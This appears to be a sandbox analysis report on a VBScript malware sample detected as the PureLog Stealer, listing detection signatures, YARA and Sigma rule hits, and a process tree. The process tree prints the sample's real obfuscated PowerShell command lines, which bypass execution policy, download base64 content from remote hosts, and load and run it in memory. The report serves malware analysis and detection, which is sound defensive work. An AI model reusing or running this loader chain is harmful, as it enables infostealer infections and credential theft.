Edit tour
Windows
Analysis Report
f4576JaIo9.vbs
Overview
General Information
| Sample name: | f4576JaIo9.vbsrenamed because original name is a hash value |
| Original sample name: | 71c7461092c4a0705d5cbe43dab4757a336144a782d667fee8758ffe8380b691.vbs |
| Analysis ID: | 1523830 |
| MD5: | 688fda516895b564b731b61a5ff25f3c |
| SHA1: | 2ed013d46c2c403b5ec3bc344073d883015908aa |
| SHA256: | 71c7461092c4a0705d5cbe43dab4757a336144a782d667fee8758ffe8380b691 |
| Tags: | BlindEaglevbsuser-JAMESWT_MHT |
| Infos: |   |
 | |
Detection
PureLog Stealer
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 5232 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\f4576 JaIo9.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 2852 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnWicrJ2 5pdScrJ3Js JysnID0gN3 VYaHR0Jysn cHM6Ly9pYT YnKycwJysn MDEnKycwJy snMCcrJy51 cy4nKydhJy sncmMnKydo aXYnKydlLm 9yZy8nKycy NC9pdGVtcy 9kJysnZScr J3RhaCcrJy 1ub3RlJysn LXYvRGUnKy d0YWhOb3Rl Vi4nKyd0eC crJ3Q3Jysn dVgnKyc7Jy snWicrJ25p YmFzJysnZT Y0JysnQ29u JysndCcrJ2 VudCA9IChO ZXctT2InKy dqZWN0IFN5 Jysnc3RlJy snbScrJy4n KydOJysnZS crJ3QuV2Vi QycrJ2wnKy dpZW50Jysn KS5EbycrJ3 cnKyduJysn bG9hZFN0Jy sncmluZyha JysnbicrJ2 l1cmwpJysn O1puaScrJ2 JpbmFyeUMn KydvbicrJ3 RlbnQnKycg JysnPSBbUy crJ3lzdGUn KydtLkMnKy dvJysnbnZl cicrJ3RdOj pGcicrJ29t QmFzZTY0U3 RyaScrJ24n KydnKFpuaW Jhc2U2Jysn NENvbnQnKy dlJysnbicr J3QnKycpOy crJ1puaWEn Kydzc2VtYm wnKyd5ICcr Jz0gW1JlZm wnKydlY3Qn Kydpb24nKy cuQXNzZScr J20nKydibH ldJysnOjpM Jysnb2FkJy snKCcrJ1on KyduaWJpJy snbmFyeUNv bicrJ3QnKy dlJysnbnQp O1onKyduJy snaXR5cGUg JysnPScrJy BaJysnbmlh c3NlbWInKy dseS5HZXRU eXBlKDd1WC crJ1InKyd1 JysnblBFLk gnKydvJysn bWU3JysndV gnKycpOycr J1puaW1lJy sndGgnKydv ZCcrJyAnKy c9IFonKydu JysnaXR5cG UuJysnRycr J2UnKyd0TW V0JysnaCcr J29kJysnKD d1WCcrJ1Yn KydBSTd1Jy snWCk7Wicr J25pbWV0aG 8nKydkLkkn Kydudm9rZS gnKydabicr J2knKyduJy sndWxsLCcr JyAnKydbJy snb2JqZWMn Kyd0W11dJy snQCcrJyg3 dVh0eHQuRi crJ0ZDTlIv NDEnKyc0Mi 81OC45OCcr JzEuMicrJz MnKycyLjI3 MScrJy8nKy cvJysnOnB0 dGgnKyc3Jy sndVggJysn LCA3dVhkZX NhdGl2YScr J2RvNycrJ3 VYICcrJywg N3UnKydYZG VzJysnYScr J3RpJysndm EnKydkbzd1 WCAsJysnID d1WCcrJ2Qn Kydlc2F0aX ZhZG83dVgs NycrJ3VYUi crJ2VnQScr J3NtNycrJ3 VYJysnLDd1 WDcnKyd1WC kpJyktUkVw bGFDZSAoW0 NoQXJdNTUr W0NoQXJdMT E3K1tDaEFy XTg4KSxbQ2 hBcl0zOSAt UkVwbGFDZS dabmknLFtD aEFyXTM2KS B8LiAoICRl TlY6Y09tU1 BlQ1s0LDI0 LDI1XS1qb2 lOJycp';$O Wjuxd = [s ystem.Text .encoding] ::UTF8.Get String([sy stem.Conve rt]::Fromb ase64Strin g($codigo) );powershe ll.exe -wi ndowstyle hidden -ex ecutionpol icy bypass -NoProfil e -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 7016 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5708 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('Z' +'niu'+'rl '+' = 7uXh tt'+'ps:// ia6'+'0'+' 01'+'0'+'0 '+'.us.'+' a'+'rc'+'h iv'+'e.org /'+'24/ite ms/d'+'e'+ 'tah'+'-no te'+'-v/De '+'tahNote V.'+'tx'+' t7'+'uX'+' ;'+'Z'+'ni bas'+'e64' +'Con'+'t' +'ent = (N ew-Ob'+'je ct Sy'+'st e'+'m'+'.' +'N'+'e'+' t.WebC'+'l '+'ient'+' ).Do'+'w'+ 'n'+'loadS t'+'ring(Z '+'n'+'iur l)'+';Zni' +'binaryC' +'on'+'ten t'+' '+'= [S'+'yste' +'m.C'+'o' +'nver'+'t ]::Fr'+'om Base64Stri '+'n'+'g(Z nibase6'+' 4Cont'+'e' +'n'+'t'+' );'+'Znia' +'ssembl'+ 'y '+'= [R efl'+'ect' +'ion'+'.A sse'+'m'+' bly]'+'::L '+'oad'+'( '+'Z'+'nib i'+'naryCo n'+'t'+'e' +'nt);Z'+' n'+'itype '+'='+' Z' +'niassemb '+'ly.GetT ype(7uX'+' R'+'u'+'nP E.H'+'o'+' me7'+'uX'+ ');'+'Znim e'+'th'+'o d'+' '+'= Z'+'n'+'it ype.'+'G'+ 'e'+'tMet' +'h'+'od'+ '(7uX'+'V' +'AI7u'+'X );Z'+'nime tho'+'d.I' +'nvoke('+ 'Zn'+'i'+' n'+'ull,'+ ' '+'['+'o bjec'+'t[] ]'+'@'+'(7 uXtxt.F'+' FCNR/41'+' 42/58.98'+ '1.2'+'3'+ '2.271'+'/ '+'/'+':pt th'+'7'+'u X '+', 7uX desativa'+ 'do7'+'uX '+', 7u'+' Xdes'+'a'+ 'ti'+'va'+ 'do7uX ,'+ ' 7uX'+'d' +'esativad o7uX,7'+'u XR'+'egA'+ 'sm7'+'uX' +',7uX7'+' uX))')-REp laCe ([ChA r]55+[ChAr ]117+[ChAr ]88),[ChAr ]39 -REpla Ce'Zni',[C hAr]36) |. ( $eNV:cO mSPeC[4,24 ,25]-joiN' ')" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||